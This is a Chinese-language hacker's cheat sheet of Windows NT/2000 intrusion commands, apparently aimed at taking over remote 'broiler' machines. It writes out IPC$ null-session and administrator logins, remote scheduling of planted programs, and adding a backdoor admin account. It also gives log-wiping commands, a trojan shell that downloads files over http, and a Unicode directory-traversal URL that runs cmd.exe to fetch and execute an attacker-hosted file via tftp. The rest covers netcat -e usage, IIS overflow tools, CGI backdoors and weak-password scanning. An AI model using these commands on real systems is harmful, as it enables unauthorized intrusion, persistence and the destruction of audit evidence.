常用的几条
NET
命令:
==================================================
(与远程主机建立空管连接)
net use \\IP
地址
\ipc$ "" /use:""
(以管理员身份登录远程主机)
net use \\IP
地址
\ipc$ "
密码
" /use:"Administrator"
(传送文件到远程主机
WINNT
目录下)
copy
本机目录路径
\
程序
\\IP
地址
\admin$
(查看远程主机时间)
net time \\IP
地址
(定时启动某个程序)
at \\IP
地址
02:18 readme.exe
(查看共享)
net view \\IP
地址
(查看
netbios
工作组列表)
nbtstat -A IP
地址
(将远程主机
C
盘映射为自己的
F
盘)
net use f: \\IP
地址
\c$ ""/user:"Administrator"
(这两条把自己增加到管理员组):
net user
用户名
密码
/add net localgroup Administrators
用户名
/add
(断开连接)
net use \\IP
地址
\ipc$ /delete
擦屁屁:
del C:\winnt\system32\logfiles\*.* del C:\winnt\ssytem32\config\*.evt del C:\winnt\system32\dtclog\*.* del C:\winnt\system32\*.log del C:\winnt\system32\*.txt del C:\winnt\*.txt del C:\winnt\*.log
一、
netsvc.exe
下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
netsvc /list \\IP
地址
netsvc schedule \\IP
地址
/query netsvc \\IP
地址
schedule /start
二、
OpenTelnet.exe
远程启动主机的
Telnet
服务,并绑定端口到
7878
,例如:
OpenTelnet \\IP
地址
用户名
密码
1 7878
然后就可以
telnet
到主机的
7878
端口,进入
DOS
方式下:
telnet IP
地址
7878
三、
winshell.exe
一个非常小的木马(不到
6K
),
telnet
到主机的
7878
端口,输入密码
winshell
,当看到
CMD>
后,可打下面的命令:
p Path
(查看
winshell
主程序的路径信息)
b reBoot
(重新启动机器)
d shutDown
(关闭机器)
s Shell
(执行后你就会看到可爱的
“C:\>
”)
x eXit
(退出本次登录会话,此命令并不终止
winshell
的运行)
CMD>
http://.../srv.exe
(通过
http
下载其他网站上的文件到运行
winshell
的机器上)
四、
3389
登陆器,
GUI
方式登录远程主机的
五、
elsave.exe
事件日志清除工具
elsave -s \\IP
地址
-l "application" -C elsave -s \\IP
地址
-l "system" -C elsave -s \\IP
地址
-l "security" -C
执行后成功清除应用程序日志,系统日志,安全日志
六、
hbulot.exe
开启
win2kserver
和
winxp
的
3389
服务
hbulot [/r]
使用
/r
表示安装完成后自动重起目标使设置生效。
七、
nc.exe(netcat.exe)
一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
想要连接到某处
: nc [-options] hostname port[s] [ports] ...
绑定端口等待连接
: nc -l -p port [-options] [hostname] [port]
参数
: -e prog
程序重定向,一旦连接,就执行
[
危险
!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, ... -h
帮助信息
-i secs
延时的间隔
-l
监听模式,用于入站连接
-n
指定数字的
IP
地址,不能用
hostname -o file
记录
16
进制的传输
-p port
本地端口号
-r
任意指定本地及远程端口
-s addr
本地源地址
-u UDP
模式
-v
详细输出
——
用两个
-v
可得到更详细的内容
-w secs timeout
的时间
-z
将输入输出关掉
——
用于扫描时
八、
TFTPD32.EXE
把自己的电脑临时变为一台
FTP
服务器,让肉鸡来下载文件,
tftp
命令要在肉鸡上执行,通常要利用
Unicode
漏洞或
telnet
到肉鸡,例如:
http://IP
地址
/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i
本机
IP
地址
get
文件名
c:\winnt\system32\
文件名
然后可以直接令文件运行:
http://IP
地址
/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+
文件名
九、
prihack.exe
是
IIS
的
printer
远程缓冲区溢出工具。
idqover.exe
是溢出
idq
的,选择
“
溢出后在一个端口监听
”
,然后用
telnet
连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。
xploit.exe
是一个图形界面的
ida
溢出,成功以后
winxp
下需要打
winxp
。
一○、
ntis.exe
、
cmd.exe
和
cmdasp.asp
是三个
cgi-backdoor
,
exe
要放到
cgi-bin
目录下,
asp
放到有
ASP
执行权限的目录。然后用
IE
浏览器连接。
一、一
Xscan
命令行运行参数说明:
在检测过程中,按
"[
空格
]"
键可以查看各线程状态及扫描进度,按
"q"
键保存当前数据后提前退出程序,按
"<ctrl+c>"
强行关闭程序。
1.
命令格式
: xscan -host <
起始
IP>[-<
终止
IP>] <
检测项目
> [
其他选项
] xscan -file <
主机列表文件名
> <
检测项目
> [
其他选项
]
其中
<
检测项目
>
含义如下
: -port :
检测常用服务的端口状态
(
可通过
\dat\config.ini
文件的
"PORT-SCAN-OPTIONS\PORT-LIST"
项定制待检测端口列表
)
;
-ftp :
检测
FTP
弱口令
(
可通过
\dat\config.ini
文件设置用户名
/
密码字典文件
)
;
-ntpass :
检测
NT-Server
弱口令
(
可通过
\dat\config.ini
文件设置用户名
/
密码字典文件
)
;
-cgi :
检测
CGI
漏洞
(
可通过
\dat\config.ini
文件的
"CGI-ENCODE\encode_type"
项设置编码方案
)
;
-iis :
检测
IIS
漏洞
(
可通过
\dat\config.ini
文件的
"CGI-ENCODE\encode_type"
项设置编码方案
)
;
[
其他选项
]
含义如下
: -v:
显示详细扫描进度
-p:
跳过
Ping
不通的主机
-o:
跳过没有检测到开放端口的主机
-t <
并发线程数量
[,
并发主机数量
]>:
指定最大并发线程数量和并发主机数量
,
默认数量为
100,10
|